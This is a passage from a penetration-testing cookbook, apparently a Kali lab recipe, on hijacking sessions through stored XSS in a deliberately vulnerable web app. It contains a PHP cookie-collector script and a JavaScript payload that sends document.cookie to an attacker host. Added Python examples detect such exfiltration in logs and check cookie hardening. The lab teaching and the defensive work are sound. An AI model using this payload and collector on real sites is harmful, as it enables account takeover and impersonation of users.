Obtaining session cookies through XSS

We have already talked about Cross-Site Scripting (XSS); it is one of the most common web attacks nowadays. XSS can be used to trick users into providing credentials by simulating login pages, to gather information by executing client-side commands, or to hijack sessions by obtaining session cookies and impersonating their legitimate owners in the attacker's browser.

In this recipe, we will take advantage of a persistent XSS vulnerability to obtain the session cookie of a user and then use that cookie to hijack the session by implanting it in another browser, and then executing actions impersonating the user.

Getting ready

For this recipe, we will set up a web server that will act as our cookie gatherer; so, before we attack, we need to start the Apache server in our Kali machine and run the following in a terminal as root:

service apache2 start

In the system used for this book, Apache's document root is located at /var/www/html. Create a file called savecookie.php in that directory and put the following code in it:

<?php
// Append the value of the "cookie" query parameter to a file, one entry per line.
$fp = fopen('/tmp/cookie_data.txt', 'a');
fwrite($fp, $_GET["cookie"] . "\n");
fclose($fp);
?>

This PHP script is the one that will gather all the cookies sent by the XSS attack. To make sure that it works, go to http://127.0.0.1/savecookie.php?cookie=test and then check the contents of /tmp/cookie_data.txt:

cat /tmp/cookie_data.txt 

If it shows the word test, everything is fine. The next step is to find out the address of our Kali machine on VirtualBox's host-only network. In a terminal, run:

ifconfig

For this book, the vboxnet0 interface of the Kali machine has the 192.168.56.1 IP address.

How to do it...

  1. We will use two different browsers in this recipe, OWASP-Mantra will be the attacker's browser and Iceweasel will be the victim's. In the attacker's browser, go to http://192.168.56.102/peruggia/.
  2. Let's add a comment to the picture on that page, click on Comment on this picture.
  3. Insert the following in the text box:
    <script>
    var xmlHttp = new XMLHttpRequest();
    xmlHttp.open( "GET", "http://192.168.56.1/savecookie.php?cookie=" + document.cookie, true );
    xmlHttp.send( null );
    </script>
  4. Click on Post.
  5. The page will execute our script even if we don't see any change. Check the contents of the cookies file to see the result. On your Kali machine, open a terminal and run:
    cat /tmp/cookie_data.txt

    A new entry should appear in the file.

  6. Now, in the victim's browser go to http://192.168.56.102/peruggia/.
  7. Click on Login.
  8. Enter admin, both as username and password and click on Login.
  9. Let's check the contents of the cookies file again:
    cat /tmp/cookie_data.txt

    The last entry was generated by the user in the victim's browser.

  10. Now, in the attacker's browser, make sure that you are not logged in and open Cookies Manager+ (in Mantra's menu, Tools | Application Auditing | Cookies Manager+).
  11. Select the PHPSESSID cookie from 192.168.56.102 (the vulnerable_vm) and click on Edit.
  12. Copy the last cookie value from /tmp/cookie_data.txt and paste it in the Content field.
  13. Click on Save, then Close, and reload the page in the attacker's browser.

    Now we have the admin's session hijacked via a persistent XSS attack.
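From the defender's side, the request sent in step 3 leaves a trace wherever outbound URLs are recorded with their query string: a web proxy log, a CSP report endpoint, or an access log like the one Apache writes for savecookie.php. The following is an added example, not part of the original recipe: a small Python scanner over constructed Apache combined-format log lines that flags requests whose query string carries a session cookie (the cookie=PHPSESSID=... shape that document.cookie produces) or a bare session-id-like value, and keeps the Referer, which names the page hosting the injected comment. The parameter names, cookie names and length heuristic are assumptions chosen for this example, not a vendor signature set.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Apache "combined" log format. Only the fields the check needs are captured.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Heuristics (assumptions for this example, not a vendor signature set):
# - parameter names a collector script is likely to use for the stolen value,
# - cookie names whose value should never appear inside a URL,
# - the shape of a bare session id (PHP's default ids are 26 or 32 characters).
SUSPECT_PARAMS = {"cookie", "cookies", "c", "data", "session", "sess", "token"}
SESSION_COOKIE_NAMES = {"PHPSESSID", "JSESSIONID", "ASP.NET_SessionId", "sessionid"}
SESSION_ID_RE = re.compile(r"^[A-Za-z0-9,-]{20,}$")


def parse_line(line):
    """Split one access-log line into its fields, or return None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def cookie_leak_reasons(target):
    """List the reasons a request target looks like it carries a session cookie in its query string."""
    reasons = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        # document.cookie appended verbatim gives "cookie=PHPSESSID=<id>": the stolen
        # cookie's own name=value pair sits inside the parameter value.
        inner_name, _, inner_value = value.partition("=")
        if inner_name in SESSION_COOKIE_NAMES:
            reasons.append(f"param {name!r} contains cookie {inner_name}")
        elif name in SESSION_COOKIE_NAMES:
            reasons.append(f"session cookie {name} passed as a query parameter")
        elif name.lower() in SUSPECT_PARAMS and SESSION_ID_RE.match(inner_value or inner_name):
            reasons.append(f"param {name!r} carries a session-id-like value")
    return reasons


def scan(lines):
    """Return one record per log line that looks like cookie exfiltration.
    The Referer is kept because it names the page that hosted the injected script."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = cookie_leak_reasons(rec["target"])
        if reasons:
            hits.append({"client": rec["client"], "referer": rec["referer"],
                         "target": rec["target"], "reasons": reasons})
    return hits


# Constructed sample log lines: a normal request, the recipe's exfiltration request,
# a tracking-pixel style leak carrying a bare session id, and an unparseable line.
SAMPLE_LOG = [
    '192.168.56.102 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?page=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.168.56.102 - - [01/Jan/2024:10:00:05 +0000] "GET /savecookie.php?cookie=PHPSESSID=0123456789abcdefghijklmnop HTTP/1.1" 200 0 "http://192.168.56.102/peruggia/index.php" "Mozilla/5.0"',
    '192.168.56.102 - - [01/Jan/2024:10:00:09 +0000] "GET /img.gif?c=a1b2c3d4e5f6a7b8c9d0e1f2g3h4 HTTP/1.1" 200 43 "http://192.168.56.102/peruggia/index.php" "Mozilla/5.0"',
    "this line is not an access-log record",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"{hit['client']} -> {hit['target']} (referer {hit['referer']}): {'; '.join(hit['reasons'])}")
```

Run it as-is to see the two flagged lines; point scan() at a real log by reading the file line by line. The Referer on a hit is the first place to look for the stored payload, and the client address tells you which user's browser executed it.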

How it works...

In short, we used an XSS vulnerability in the application to send the session cookie to a remote server through a JavaScript HTTP request; this server was configured to store the session cookies. Then, we took one session ID and implanted it in a different browser to hijack an authenticated user's session. Next, we will see how each step works.

The PHP file we made in the Getting ready section is the one that saves the received cookies when the XSS attack is executed.

The comment we introduced is a script that uses the XMLHttpRequest object from JavaScript to make an HTTP request to our malicious server; that request is made in two steps:

xmlHttp.open( "GET", "http://192.168.56.1/savecookie.php?cookie=" + document.cookie, true );

We open a request using the GET method to the http://192.168.56.1/savecookie.php URL, adding a parameter called cookie whose value is taken from document.cookie, the JavaScript property that exposes the cookies of the current page. The last parameter, set to true, tells the browser that the request is asynchronous, which means the script does not wait for the response.

xmlHttp.send( null );

This last instruction sends the request to the server.

After the administrator logs in and views a page that includes the comment we posted, the script is executed and the administrator's session cookie is stored in our server.

Finally, once we get the session ID of a valid user, we just replace our own session cookie with it in the browser and reload the page to perform operations as if we were that user.
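The recipe works because of two server-side choices: the session cookie is readable from document.cookie, and the comment is placed into the page without output encoding. Marking the session cookie HttpOnly makes browsers omit it from document.cookie (the payload above would then send an empty value), and HTML-encoding the comment when it is rendered (htmlspecialchars in PHP) makes the script tag display as text instead of running. The Python below is an added example, not code from the recipe or from Peruggia: it checks a Set-Cookie header for the HttpOnly, Secure and SameSite attributes, models what document.cookie would expose for that header, and renders the stored comment with output encoding. The header strings and the stored comment are constructed for the example.

```python
import html
from http.cookies import SimpleCookie

# Attributes a session cookie should carry. HttpOnly is the one that defeats
# document.cookie theft; Secure and SameSite close the neighbouring gaps
# (plaintext transport, cross-site request forgery).
REQUIRED_FLAGS = ("httponly", "secure", "samesite")

# Constructed Set-Cookie headers: one as a default PHP setup might send it, one hardened.
WEAK_HEADER = "PHPSESSID=0123456789abcdefghijklmnop; path=/"
HARDENED_HEADER = "PHPSESSID=0123456789abcdefghijklmnop; path=/; HttpOnly; Secure; SameSite=Strict"

# The opening of the recipe's payload as it would sit in the comments table (constructed).
STORED_COMMENT = "<script>var xmlHttp = new XMLHttpRequest();</script>"


def missing_cookie_flags(set_cookie_header):
    """Return the hardening attributes absent from the cookies in a Set-Cookie header."""
    jar = SimpleCookie()
    jar.load(set_cookie_header)
    missing = []
    for morsel in jar.values():
        for flag in REQUIRED_FLAGS:
            if not morsel[flag]:
                missing.append(flag)
    return missing


def document_cookie_view(set_cookie_header):
    """Model of what document.cookie exposes for these cookies: browsers leave out
    HttpOnly ones. Simplified: path/domain scoping and expiry are ignored."""
    jar = SimpleCookie()
    jar.load(set_cookie_header)
    return "; ".join(f"{name}={m.value}" for name, m in jar.items() if not m["httponly"])


def render_comment(raw_comment):
    """Output-encode a stored comment before inserting it into the page.
    html.escape stands in for PHP's htmlspecialchars($comment, ENT_QUOTES, 'UTF-8')."""
    return '<p class="comment">' + html.escape(raw_comment, quote=True) + "</p>"


if __name__ == "__main__":
    for label, header in (("weak", WEAK_HEADER), ("hardened", HARDENED_HEADER)):
        print(f"{label}: missing={missing_cookie_flags(header)} "
              f"document.cookie={document_cookie_view(header)!r}")
    print(render_comment(STORED_COMMENT))
```

To check a live application, paste the Set-Cookie header from the login response (for example from the browser's network tab) into missing_cookie_flags(); an empty list means the session cookie carries all three attributes. HttpOnly only removes the cookie-theft route; the stored script still runs, so output encoding of the comment is the fix for the XSS itself.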

There's more...

Instead of only saving the session cookies to a file, the malicious server can also use those cookies to send requests to the application impersonating legitimate users, in order to perform operations such as adding or deleting comments, uploading pictures, or creating new users, even administrators.
